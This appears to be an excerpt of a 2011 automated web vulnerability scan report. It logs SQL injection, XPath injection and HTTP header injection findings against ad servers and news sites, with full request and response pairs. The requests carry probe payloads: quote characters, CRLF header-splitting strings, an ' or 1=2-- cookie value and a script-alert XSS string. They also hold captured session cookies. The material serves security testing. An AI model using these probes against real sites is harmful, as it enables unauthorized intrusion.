Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US12592570'%20or%201%3d2--%20; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
ntCoent-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEzMC4xLjEuaTI6MTAzLjQuMS5pNjoxNzEuMS4wOjQ4LjEuMDo5OC42LjQ6MTQyLjAuMC5pNDoyMDAuMC4wOjE5OC4wLjA6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4wLjAuaTF8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>

1.23. http://www.revresda.com/event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.revresda.com
Path:   /event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 03 Oct 2011 00:37:28 GMT
Server: Apache/2.2.3 (CentOS)
ntCoent-Length: 617
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 617

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 2

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 00:37:28 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: max-age=0
Content-Length: 0
Cache-control: no-cache
Location: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html; charset=UTF-8


1.24. http://www.revresda.com/event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.revresda.com
Path:   /event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 03 Oct 2011 00:37:26 GMT
Server: Apache/2.2.3 (CentOS)
ntCoent-Length: 617
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 617

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 2

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 00:37:27 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: max-age=0
Content-Length: 0
Cache-control: no-cache
Location: http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html; charset=UTF-8


2. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-15.js

Issue detail

The put_2101 cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the put_2101 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /a/7743/12359/21900-15.js?cb=0.14229151024483144 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1'; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; rdk9=0; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; rdk=7743/12359; rdk2=0; ses2=13378^2&12566^2&12359^1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:00:29 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 01:00:29 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 01:00:29 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^3&12566^2&12359^68; expires=Tue, 04-Oct-2011 04:59:59 GMT; max-age=115170; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3348

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
et/adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDsOhDAMBa.CXG8kEjv.7G1iCBWio1rt3bGpPCM9zw8Q4buYUrXPAthCVDo1Dash4OtwZrNCm4xCenixbVjZlX2XOetsDvmaY.ltlbTsZLDHRX5rFHjd5xnIgbUTivwfI_ccIA--&redirectURL=;ord=b0ab6699-4c7a-48fb-9ca9-d86bd7ee1e2b?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSP
...[SNIP]...

3. HTTP header injection  previous  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 941ce%0d%0af56167da7a4 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1517119;host=nike.112.2o7.net%2Fb%2Fss%2Fnikefootballglobal%2Cnikeall%2F1%2FH.22.1%2Fs93092863939236%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D27447D5405012A65-6000010FA00F4A54%26%26ndh%3D1%26t%3D2%252F9%252F2011%252018%253A58%253A28%25200%2520300%26vmt%3D4DCC71DA%26vmf%3Dnike.112.2o7.net%26ce%3DUTF-8%26ns%3Dnike%26pageName%3DGLSC%253Elang_selector%253Emain%26g%3Dhttp%253A%252F%252Fwww.nike.com%252Fnikeos%252Fp%252Fnikefootball%252Flanguage_tunnel%253Flid%253Dnikebutton%26r%3Dhttp%253A%252F%252Fwww.manutd.com%252FSearch-Results.aspx%253Fqs%253Dmanutd_frontend%2526catTxt%253D%2526searchText%253Dxss75931%25253Cscript%25253Ealert%28document.location%29%25253C%252Fscript%25253E14fb8fbf954%26vvp%3DDFA%25231517119%253Av49%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dsoccer%26server%3Dnikefootballglobal%26events%3Devent13%26v5%3DD%253DUser-Agent%26c18%3Dlanguage_selector%26c24%3DD%253DUser-Agent%26c26%3DD%253Dg%26v48%3DD%253DpageName%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1074%26bh%3D906%26p%3DShockwave%2520Flash%253BQuickTime%2520Plug-in%25207.7%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BSilverlight%2520Plug-In%253BMicrosoft%2520Office%25202010%253BRemoting%2520Viewer%253BNative%2520Client%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Earth%2520Plugin%253BGoogle%2520Updater%253BGoogle%2520Update%253BiTunes%2520Application%2520Detector%253BWPI%2520Detector%25201.4%253BDefault%2520Plug-in%253B%26AQE%3D1941ce%0d%0af56167da7a4&A2S=1;ord=1732731727 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://nike.112.2o7.net/b/ss/nikefootballglobal,nikeall/1/H.22.1/s93092863939236?AQB=1&vvpr=true&&pccr=true&vidn=27447D5405012A65-6000010FA00F4A54&&ndh=1&t=2%2F9%2F2011%2018%3A58%3A28%200%20300&vmt=4DCC71DA&vmf=nike.112.2o7.net&ce=UTF-8&ns=nike&pageName=GLSC%3Elang_selector%3Emain&g=http%3A%2F%2Fwww.nike.com%2Fnikeos%2Fp%2Fnikefootball%2Flanguage_tunnel%3Flid%3Dnikebutton&r=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954&vvp=DFA%231517119%3Av49%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=soccer&server=nikefootballglobal&events=event13&v5=D%3DUser-Agent&c18=language_selector&c24=D%3DUser-Agent&c26=D%3Dg&v48=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1941ce
f56167da7a4
&A2S=1/respcamphist;src=1517119;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1317599960:
Date: Sun, 02 Oct 2011 23:59:20 GMT
Server: GFE/2.0
Content-Type: text/html


3.2. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap [476949646137654800&c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kantarmedia.guardian.co.uk
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the 476949646137654800&c request parameter is copied into the Set-Cookie response header. The payload 958bb%0d%0aa655d8051a4 was submitted in the 476949646137654800&c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?476949646137654800&c=958bb%0d%0aa655d8051a4&e=14d HTTP/1.1
Host: kantarmedia.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html?054612530__!__http://kantarmedia.guardian.co.uk__!__&Paneled_Site=guardian.co.uk&Paneled_Section=football
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:52:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 958bb
a655d8051a4
=0; expires=Sun, 16-Oct-11 23:52:08 GMT; path=/; domain=.guardian.co.uk
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


4. Cross-site scripting (reflected)  previous  next
There are 435 instances of this issue:

Issue background

